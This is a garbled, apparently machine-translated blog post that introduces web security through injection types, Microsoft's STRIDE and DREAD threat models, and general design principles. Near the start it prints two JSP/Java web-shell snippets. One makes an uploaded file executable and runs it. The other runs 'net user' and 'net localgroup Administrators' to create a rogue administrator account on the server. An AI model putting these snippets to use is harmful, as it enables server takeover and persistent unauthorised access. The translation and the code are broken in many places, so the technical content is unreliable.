Talk in Web Security (Security world View): Devleping a secure We

writer:bysocket (mud and brick pulp carpenter)

• Micro-Blog: Bysocket

• Watercress: Bysocket

reprint it anywhere u want.

Why to write about Web Security?

A java file can hack your server. One JSP can download any file. How does this?
1. Write a JSP and upload to the server.
2. Use JSP to download any bugs by HttpClient.
3. Open the virus and get/add the infomation of admin or datas
We can see some from what I write. its easy but useful:

?

1 2 3 4 5 6 7 8 9 10 11

<fontsize= "4" face= "Song Body" > if (! Iswindows ())                 {                      process Process = Runtime.getruntime (). EXEC ("chmod 777" +strexefile);                                             if (process.waitfor ()! = 0)                          out.println ("FAIL--- > when open File ");                 }                                   process Process = Runtime.getruntime (). exec (Strexefile);                 if ( Process.waitfor () = = 0)                      out.println ("SUCCESS---> when open the file");</font>

Use Java to open the bug. And then get a administrator user.

?

1 2 3 4 5 6 7 8 9 10 11 12

if (iswindows ()) {    string execstr = "cmd.exe/c" + "NET User" + Stracc + "+ strpwd +"/add " ;     process Process = Runtime.getruntime (). EXEC (EXECSTR);              if (process.waitfor () = = 0)     {         runtime.getruntime (). EXEC ("cmd.exe/c" + "net localgroup Administrators" + STRACC + "/add");     }     else         out.print ("FAIL---> when" + execstr);}

Its on how to use java to get add-an administrator user.

Here is some injections we can see anywhere. So we need learn the Web Security. First we can learn from the Web.

Some of Web Security needed to know

Since the environment getting worse,like Haze. So many persons wear masks when going out. Just like the Protect ourselves, we trust the masks. Its the same as Web security.

Note: ' Web security is based on the trust,every-on-the-web security is also based on the Trusts. '

Many web attacks like Haze:
1. XSS

2. CRLF injection

3. X-path Injection

4. HTML Injection

5. JavaScript Injection

 

XSS Development:

So there are a question: ' How to analysis the Web security of software or project? '

STRIDE (Security) DREAD by Microsoft STRIDE STRIDE is a system developed by Microsoft for thinking about computer security threats. The threat categories is:
1. SPoofing of user identity

2. Tampering

3. Repudiation

4. Infomation Disclosure

5. Denial of Service

6. Elevation of Privilege

DREAD

The problem with a simplistic rating system is, the team members usually won't agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model was used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:

1. D Amage potential:how Great is the damage if the and the vulnerability is exploited?

2. R Eproducibility:how Easy are it to reproduce the attack?

3. E Xploitability:how Easy are it to launch an attack?

4. A ffected users:as a rough percentage, how many users is affected?

5. D Iscoverability:how Easy are it to find the vulnerability?

So after these categories,a good the "to design" on Web Security have some features:

1. Solve problem in effect

2. Good experience for users

3. Low coupling

4. Easy to extend and upgrade

How to Devlep a Secure WebSite

Note: ' Security is a normal subject and a poised art. '

1. Secure by Default

Its also the security of the users. We can create the white list and the Black list and limits of user Operation.

2. Defense in Depth

Defense in Depth are a crucial model for implementing effective information security. The details of such a diverse model is what make it successful, I has put together a series of eight webcasts on this to Pic. Here is 7 levels:

3. quarantine between Data and Demo

4. uncertainly of unpredictability

The paramters is easy to guess. So let them is hard to guess.

Think in Web Security

Like a bucket of water, we trust the bucket and water. its the Security. When the bucket has the chemistry-poison,the security would be broken.
Note: ' Open free Share '

G night~

writer:bysocket (mud and brick pulp carpenter)

• Micro-Blog: Bysocket

• Watercress: Bysocket

reprint it anywhere u want.

Talk in Web Security (Security world View): Devleping a secure We